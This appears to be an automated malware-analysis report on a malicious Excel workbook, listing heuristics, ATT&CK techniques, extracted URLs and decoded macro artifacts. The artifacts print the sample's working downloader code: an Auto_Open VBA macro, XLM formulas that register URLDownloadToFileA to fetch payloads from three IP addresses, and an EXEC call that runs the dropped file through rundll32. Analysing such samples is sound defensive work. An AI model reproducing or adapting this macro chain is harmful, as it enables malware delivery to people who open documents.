Verdict: MALICIOUS
Risk Score: 190

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample contains critical Excel 4.0 macros that use dangerous functions such as CALL and REGISTER to download and execute payloads. The Auto_Open VBA macro also attempts to run a sheet named 'Klof'. The presence of multiple suspicious URLs suggests downloader or dropper functionality. The combination of VBA and XLM macros points to a sophisticated attack leveraging older Excel features.
Heuristics (6)

- Excel 4.0 macro sheet (2 sheet(s)) [critical, 1 related finding, OOXML_XLM_MACROSHEET]: Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
- Dangerous XLM formula APIs: HALT, REGISTER, GOTO, EXEC [critical, OOXML_XLM_DANGEROUS_FN]: Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
- VBA project inside OOXML [medium, 1 related finding, OOXML_VBA]: Document contains a VBA project (VBA macros present).
- Auto_Open macro [high, OLE_VBA_AUTO]: Auto_Open macro present.
- Hidden worksheet (hidden) [low, OOXML_HIDDEN_SHEET]: Excel workbook contains 2 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://45.138.157.63/ (in document text: OOXML body / shared strings)
  - http://185.14.31.59/44313,6048108796.dat (in document text: OOXML body / shared strings)
  - http://45.138.157.63/44313,6048108796.dat (in document text: OOXML body / shared strings)
  - http://167.114.48.59/44313,6048108796.dat (in document text: OOXML body / shared strings)
  - http://185.14.31.59/ (in document text: OOXML body / shared strings)
  - http://167.114.48.59/ (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/spreadsheetml/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/excel/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2014/revision (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2015/revision2 (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2016/revision3 (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2016/revision6 (in document text: OOXML body / shared strings)
Extracted artifacts (4)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 16398 bytes | 93c5b5069f910db13d08004fd9c90d4a1d5d55d767ea4a26da2a888ea23d58c3 |
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "dfgbfdg"
Private Sub Auto_Open()
Application.Run Sheets("Klof").Range("AJ6")
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMax
... (truncated)
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 28160 bytes | 8cb40a0b5e5940f328e54000440cd3d6d132d980e84d59e085c3b458e3acf2f6 |

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| xlm_sheet_00.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 4502 bytes | e8c6d8792e3e310b1df23866dbd173d4bec5628a83ded013e399050fdb4a128e |
Preview script: first 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{0131C73D-C3C0-4C7F-B61C-5AFDDB7835F8}"><dimension ref="AD92:AJ111"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="14.28515625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="28" width="14.28515625" style="3"/><col min="29" max="29" width="14.28515625" style="3" customWidth="1"/><col min="30" max="30" width="14.28515625" style="1" hidden="1" customWidth="1"/><col min="31" max="31" width="21" style="1" hidden="1" customWidth="1"/><col min="32" max="35" width="14.28515625" style="1" hidden="1" customWidth="1"/><col min="36" max="36" width="23.5703125" style="1" hidden="1" customWidth="1"/><col min="37" max="16384" width="14.28515625" style="3"/></cols><sheetData><row r="92" spans="33:36" x14ac:dyDescent="0.25"><c r="AI92" s="1"><v>1</v></c></row><row r="93" spans="33:36" x14ac:dyDescent="0.25"><c r="AI93" s="1"><v>9</v></c></row><row r="94" spans="33:36" x14ac:dyDescent="0.25"><c r="AJ94" s="1" t="b"><f>ON.TIME(NOW()+"00:00:02","JEIUYUITRYF")</f><v>0</v></c></row><row r="95" spans="33:36" x14ac:dyDescent="0.25"><c r="AG95" s="1" t="str"><f>CONCATENATE(AG101,AH95,AG99,AG100)</f><v>http://185.14.31.59/44313,6048108796.dat</v></c><c r="AH95" 
s="1"><f>NOW()</f><v>44313.604810879631</v></c></row><row r="96" spans="33:36" x14ac:dyDescent="0.25"><c r="AG96" s="1" t="str"><f>CONCATENATE(AG102,AH95,AG99,AG100)</f><v>http://45.138.157.63/44313,6048108796.dat</v></c></row><row r="97" spans="31:36" x14ac:dyDescent="0.25"><c r="AG97" s="1" t="str"><f>CONCATENATE(AG103,AH95,AG99,AG100)</f><v>http://167.114.48.59/44313,6048108796.dat</v></c><c r="AJ97" s="1" t="b"><f>HALT()</f><v>0</v></c></row><row r="98" spans="31:36" x14ac:dyDescent="0.25"><c r="AH98" s="1"><f>CONCATENATE(AG106,AG107)</f><v>0</v></c></row><row r="99" spans="31:36" x14ac:dyDescent="0.25"><c r="AG99" s="1" t="s"><v>0</v></c><c r="AI99" s="1" t="str"><f>"uRlMon"</f><v>uRlMon</v></c></row><row r="100" spans="31:36" x14ac:dyDescent="0.25"><c r="AG100" s="1" t="s"><v>1</v></c></row><row r="101" spans="31:36" x14ac:dyDescent="0.25"><c r="AG101" s="1" t="str"><f>"http://185.14.31.59/"</f><v>http://185.14.31.59/</v></c><c r="AI101" s="1" t="str"><f>"JJCCBB"</f><v>JJCCBB</v></c></row><row r="102" spans="31:36" x14ac:dyDescent="0.25"><c r="AG102" s="1" t="s"><v>4</v></c><c r="AI102" s="1" t="s"><v>2</v></c></row><row r="103" spans="31:36" x14ac:dyDescent="0.25"><c r="AG103" s="1" t="str"><f>"http://167.114.48.59/"</f><v>http://167.114.48.59/</v></c></row><row r="104" spans="31:36" x14ac:dyDescent="0.25"><c r="AE104" s="1" t="b"><f>REGISTER(AI99,AH98,AI101,AI102,,1,9)</f><v>0</v></c><c r="AH104" s="1" t="e"><f>GOTO(AE103)</f><v>#N/A</v></c></row><row r="105" spans="31:36" x14ac:dyDescent="0.25"><c r="AE105" s="1" t="e"><f>Belandes(0,AG95,AI105,0,0)</f><v>#NAME?</v></c><c r="AI105" s="1" t="s"><v>3</v></c></row><row r="106" spans="31:36" x14ac:dyDescent="0.25"><c r="AE106" s="1" t="e"><f>IF(AE105<0, Belandes(0,AG96,AI105,0,0))</f><v>#NAME?</v></c><c r="AG106" s="1" t="str"><f>"URLDow"</f><v>URLDow</v></c></row><row r="107" spans="31:36" x14ac:dyDescent="0.25"><c r="AE107" s="1" t="e"><f>IF(AE106<0, Belandes(0,AG97,AI105,0,0))</f><v>#NAME?</v></c><c 
r="AG107" s="1" t="str"><f>"nloadToFileA"</f><v>nloadToFileA</v></c></row><row r="109"
... (truncated)
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| xlm_sheet_01.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet2.xml | 2004 bytes | efa863078546591f10559e7ec4775260a2b46f2ed03bb71ea70b51048ee05558 |
Preview script: first 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{0735C71A-62B4-499F-9DD8-467063A6E5C3}"><dimension ref="H7:I20"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="6" width="9.140625" style="1"/><col min="7" max="7" width="9.140625" style="1" customWidth="1"/><col min="8" max="8" width="9.85546875" style="1" customWidth="1"/><col min="9" max="16384" width="9.140625" style="1"/></cols><sheetData><row r="7" spans="8:9" x14ac:dyDescent="0.25"><c r="I7" s="1" t="str"><f>"r"</f><v>r</v></c></row><row r="9" spans="8:9" x14ac:dyDescent="0.25"><c r="I9" s="1" t="str"><f>"undll32 ..\Nuydar.veryrf,DllReg"</f><v>undll32 ..\Nuydar.veryrf,DllReg</v></c></row><row r="10" spans="8:9" x14ac:dyDescent="0.25"><c r="I10" s="1" t="str"><f>"isterServer"</f><v>isterServer</v></c></row><row r="16" spans="8:9" x14ac:dyDescent="0.25"><c r="H16" s="1" t="b"><f>EXEC(I7&I9&I10)</f><v>0</v></c></row><row r="20" spans="8:8" x14ac:dyDescent="0.25"><c r="H20" s="1" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>